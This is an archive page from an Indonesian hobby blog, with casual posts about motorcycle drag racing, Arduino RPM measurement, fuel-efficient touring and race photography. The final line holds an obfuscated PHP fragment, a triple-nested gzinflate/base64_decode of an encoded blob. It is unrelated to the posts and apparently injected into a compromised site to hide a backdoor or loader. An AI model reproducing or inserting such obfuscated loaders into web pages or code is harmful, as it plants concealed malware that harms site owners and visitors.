Delicious

Archives

Categories

Archive for 'Machine' Category





« »

Measuring RPM with Arduino

  ozzie / 06/11/2012

basicly.. ada beberapa metode/cara menghitung RPM (Revolution per Minute)..
[mungkin dalam case ini lebih mengarah ke 2stroke Kawasaki Ninja R.]:

1. Dengan metode Electromagnetic Induction.. yg biasa aplikasikan Timing Light.
2. Dengan metode Hall Effect, yg biasa di pakai pada pulser magnet.
3. Dan mungkin beberapa CDI (Capacitor Discharge Ignition) telah memiliki dedicated cable untuk keperluan RPM pada speedometer. cmiiw :D.. so beruntunglah yg telah memiliki CDI dgn output RPM… :)) :))

dengan beberapa metode tadi, rangkaian MicroController pun harus terisolasi / terpisah dari kelistrikan yg dalam hal ini Motor yang umumnya bertegangan > 12V, untuk itu perlu di tambahkan Opto-Coupler / Opto-Isolator untuk memisahkan keduanya, selain itu untuk supply power MicroController yg memiliki tegangan 5V sampai 9V perlu ditambahkan Voltage Regulator.
dan untuk menstabilkan / merapihkan signal output dari masing-masing metode / sensor; perlu dilengkapi dengan IC 555 yg umum digunakan untuk Timer..

Coil Ignition (Inductive PickUp / Clamp)


Pulse (Hall Effect Sensor / Position Sensor)

Special Thanks to: Dhidy D2M & all Crew D2M-HasilKebon atas masukan & motivasinya.. ;)

To Be Continue.. schema & code arduinonya lanjut besok.. :D :D



Rextor @ Slackware Linux

  ozzie / 04/11/2012

Bismillah.. just share.. :D

Mungkin default aplikasi CDI Rextor dari CD nya hanya untuk windows (.exe) ??? :-??
gimana kalo yg doyan ngebut tapi laptop/PC nya gak ada windows 8-}8-}

rextor

cukup minta file .jar nya (kebetulan pakai versi pro drag) sama temen yg pakek operating system windows… :)) :))
download jfcommon (http://www.jfree.org/jcommon/)
download jfreechart (http://www.jfree.org/jfreechart/)
download library RXTX (http://rxtx.qbang.org/



iseng nyungsep

  ozzie / 11/09/2012

Fun Race

  ozzie / 28/08/2012

Puffy

  ozzie / 12/06/2012

Tetap berkreasi mengisi waktu…

  ozzie / 16/08/2010

Pasca pecahnya mesin.. dan dalam rangka membangun ulang mesin si-merah pelan2 .. terlintas ide bareng temen-temen D2M hasil kebon buat mengisi waktu dengan membuat christmas tree buat latihan start (yg nantinya develop sekalian berjalan dengan full report reaction time drag)… sekedar muthola’ah kangen2an bermain micro-controller yg udah lama gak di oprek2.. ;)) ;))

D2M drag

konsep awal membuat Device yang bisa dibawa2 keluar buat latihan belajar start… dan mencatat semua Statistik dari semua yg udah di oprek2.. maka di carilah konsep controller yg simple, flexible, customizable.. .. pilihan jatuh pada programming USB.. karena lebih simple dah murah meriah dibanding programming chipset EPROM.. ;))

dengan bahan dasar Chipset FTDI yg terkoneksi ke PC/Laptop dengan interpreter program berbasis CLX Application yang nantinya dapat running di Operationg System MS. Windows dan LINUX.. <:-P

** bersambung……. Keluar cari makan dulu ahhhh :D :D :D



The-Jombang

  ozzie / 31/07/2010

Irit – Gesit – Mencret

  ozzie / 19/06/2010

banyak orang bilang “CC gede otomatis bensin boros…“.. Masa sihh??? 8->

dengan Kapasitas mesin 220 cc dan kondisi mesin Extreme bisa tuh touring Jakarta-Lampung cuma 3 Liter… dan masih bisa ngikutin rombongan yg kenceng2… :-" :-"

penasaran??? :> dengan disaksikan 34 motor yg berangkat touring ke lampung.. yg rata2 motor isi bensin di SPBU sebanyak 4-5 kali.. sedangkan gw cuman 1 kali :)) :)) kasih tau gak yakkkk??? 8-} 8-}

dengan karakter Karburator Keihin PWK 28mm yg Notabene lebih boros dari PE 28mm“mungkin kalo berangkat pakek PE28… bisa lebih irit mencret niyyyy” :))

dengan riset 2 minggu sebelum keberangkatan.. bermodalkan GPS untuk nge-Trip odometer & Average Speed.. simulasi menghadapi kondisi jalanan Weekday jakarta.. buang2 bensin seliter demi seliter untuk mendapatkan angka2 gaib.. hingga tercapailah 1:46 :)) :)) dengan target “Pokoknya harus bisa 1 tanki.!!!!:">

spek:
Karburator: PWK28mm
Bore: 71 mm
Stroke: 7 mm (55.8 mm)
Camshaft: Racing
Ban: 45/90 (dpn-blkng)
Final Gear: 16:35

disamping spek diatas, riding style jg ikut berpengaruh… terbukti tuh bisa buat harian touring…. ;;);;);;)

Special Thanks: Seluruh penghuni D2M-Hasilkebon dan SSFC

Related : http://gilamotor.com/2010/07/suzuki-satria-f-220-siapa-bilang-cc-besar-itu-boros/



Insiden berangkat ngantor

  ozzie / 19/03/2010

Siang itu… di tengah keberangkatan menuju kantor (Kawasan Sudirman).. terjadi insiden yg cukup fatal.. :)) :))

liar

cukup keras benturan nya hingga rangka pun kalah.. ;)).. emang terbukti dah velg takasago.. bener2 kuat :)):)) .. walaopun sempet keguling-guling kayak motogp 8-} alhamdulillah isi tas gak ada yg cedera.. [-o< gak kebayang dagh kerugian kalo isi tas kena.. {NetBook.. DSLR.. Lensa.. PDA-phone} 8-> 8->

anyway… dengan semangat ReCovery walaupun menghabiskan anggaran besar . si-merah kembali pulih dengan rangka dan kaki2 full update <:-p <:-p

saat nya Debugging ;)) ;))



DragBike Seri III 2009

  ozzie / 07/12/2009

Sentul 5-6 Desember 2009

Seri terakhir di tahun 2009.. berhubung cuman ada 3 seri di tahun ini dan kemaren cuman seri 1 ajah yg gw ikutan.. moga2 tahun depan si-merah bisa ikut berpartisipasi kembali… [-o< [-o<

Drag seri 3 2009 -sentul

karena pengeluaran lebih banyak lari ke lensa dan aksesoris nyah ;)) dan masih doyan foto-foto..

ozzie nich

dokumentasi hasil jepret2 seri 3 kemaren bisa liat di gallery gue nich:D:D



Nite Race

  ozzie / 25/10/2009

24-Okt-2009.

Nite Race @ Harapan Indah -Bekasi..
kembali menjadi tukang foto keliling ;))

Dokumentasi nyah bisa liat dimari

Makasih buat semua temen2 jakarta, bandung dan luar daerah.. sampe ketemu seri III besok.. tetap semangat bikin motor kenceng dengan sportifitas yg tinggi!.. :)>-



DragBike Seri II 2009

  ozzie / 19/10/2009

Sentul 18-Oct-2009

berhubung lagi doyan maen DSLR ;)).. Seri ini cuman berpartisipasi sebagain Tukang Foto Keliling.. :)) :)) :))
DragBike Seri II

dokumentasi nyah di mari gan…. :D



Maenan Baru..

  ozzie / 31/05/2009

Alhamdulillah ada rejeki tambahan.. [-o<
jadi tambah koleksi maenan baru deh… :D

akhirnya baju merah gentayangan lagihhh \:d/ \:d/ \:d/



DragBike Seri 1 2009

  ozzie / 26/05/2009

Alhamdulillah seri 1 sudah dilalui.. (23-24 mei 2009)..
cukup lelah juga kejar target 1 minggu full kerja di bengkel :)).. dengan dana pengeluaran yg lumayan banyak.. #:-s upgrade sana… update sini.. :-s.. ditambah biaya registrasi.. transport ke sentul.. dll.. #:-s

Dokumentasinyah: DIMARI :D :D



DragBike

  ozzie / 03/08/2008

Bangun pagi langsung berangkat ke D2M. Persiapan meluncur ke Sentul. dengan membawa ninja buat bertarung di 201 Meter.. \:d/\:d/\:d/

Menjelang siang Achie pun datang:">:">.. namun sangat disayangkan dari pihak security sirkuit yang melakukan pungli walaupun achie berada pada pihak peserta :-<:-<



Tamasya

  ozzie / 06/07/2008

Suntuk, bosen, pusing, stress dengan kerjaan dan perasaan 8-}8-}8-}… dari rencana awal ReFreshing ke Jogja :-s.. ke Gunung :-s.. bla.. bla.. bla.. lah.. :-<

Akhirnya tamasya bareng temen-temen SSFC dehh <:-p<:-p<:-p wisata 2 hari ke cirata, sagiranten, buni ayu, sukabumi \:d/\:d/

ozzie

kangen suasana gunung, pohon yang tinggi, suhu yang adem dan kehidupan yg nggak ada di jakarta…. sembari belajar Mikir cari Inspirasi.. 8->8->8->

inih Dokumentasi Fotonya :D:D



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>